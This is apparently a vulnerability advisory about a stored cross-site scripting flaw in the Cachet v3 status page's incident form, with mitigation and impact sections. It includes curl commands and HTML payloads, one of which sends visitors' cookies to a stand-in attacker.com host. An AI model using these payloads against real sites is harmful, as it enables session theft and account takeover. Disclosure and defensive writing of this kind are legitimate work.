Cachet, Stored Cross-Site Scripting, CVE-2026-113712 (Moderate) -DC-Oct2026-3494

Listen to this Post

A stored Cross-Site Scripting (XSS) vulnerability exists within the incident creation form of the application, allowing an authenticated attacker with access to the dashboard management features to inject malicious HTML and JavaScript snippets. When input fields such as the incident name or message are processed, the system fails to properly sanitize event handler attributes, even if explicit script tags are filtered out. Consequently, these malicious payloads are persistently stored in the backend database. When any unauthenticated or authenticated visitor loads the public status page, the injected code is rendered directly inside their browser context. This flaw enables attackers to perform unauthorized actions, hijack session cookies, extract sensitive tokens, or force silent redirections to administrative endpoints, ultimately risking complete account compromise across user tiers.

DailyCVE Form:

Platform: Cachet
Version: v3
Vulnerability : Stored XSS
Severity: Moderate
date: 2026-10-20

Prediction: 2026-11-05

What Undercode Say:

Bash commands and codes:

Test connection or inspect endpoint endpoints
curl -s -X GET "http://target-host/dashboard/incidents/"
Example payload injection for testing persistence via curl or API
curl -X POST "http://target-host/dashboard/incidents/" \
-d "name=<img%20src=x%20onerror=alert(1)>" \
-d "message=<img%20src=x%20onerror=fetch('http://attacker.com/leak?c='+document.cookie)>"

Exploit: (Educational Purposes!)

<!-- Payload 1: Confirm XSS execution -->
<img src=x onerror="alert(1)">
<!-- Payload 2: Cookie and token exfiltration -->
<img src=x onerror="fetch('http://attacker.com/leak?c='+document.cookie)">
<!-- Payload 3: Forced redirect to sensitive dashboard management -->
<img src=x onerror="window.location='/dashboard/manage-customization'">

Protection:

To mitigate this stored Cross-Site Scripting vulnerability, implement strict contextual output encoding for all user-supplied data rendered on the public status page. Ensure that input validation routines comprehensively sanitize all HTML event handler attributes (such as onerror, onload, and onclick) rather than solely stripping out primary script tags. Additionally, deploy a robust Content Security Policy (CSP) header to restrict script execution sources and enforce the HttpOnly flag on all sensitive session cookies to prevent document.cookie access.

Impact:

Successful exploitation of this vulnerability enables malicious actors to persistently execute arbitrary JavaScript in the browsers of all visitors viewing the status page. This leads to severe consequences including session token theft, XSRF token harvesting, forced browser redirections to sensitive configuration panels, and potentially full account takeover of regular users and administrators alike.
